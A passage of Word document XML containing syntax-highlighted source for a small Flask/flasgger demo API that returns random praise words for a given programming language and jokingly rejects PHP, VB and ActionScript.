        <w:t>#! /usr/bin/python3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:i/>
          <w:color w:val="808080"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t># -*- coding:utf-8  -*-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:i/>
          <w:color w:val="808080"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:i/>
          <w:color w:val="808080"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">flask </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Flask, jsonify, request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">flasgger </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Swagger, swag_from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>app = Flask(__name__)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Swagger(app)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="808000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'/api/&lt;string:language&gt;/'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="660099"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>methods</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'GET'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="808000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>@swag_from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"api_get.yml"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>index(language):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    language = language.lower().strip()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    features = [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"awesome"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"great"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"dynamic"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"simple"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"powerful"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"amazing"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"perfect"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"beauty"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"lovely"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    size = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(request.args.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'size'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">language </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'php'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'vb'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'visualbasic'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'actionscript'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>]:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"An error occurred, invalid language for awesomeness"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>500</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>jsonify(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="660099"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>language</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=language,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="660099"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>features</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=random.sample(features, size)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
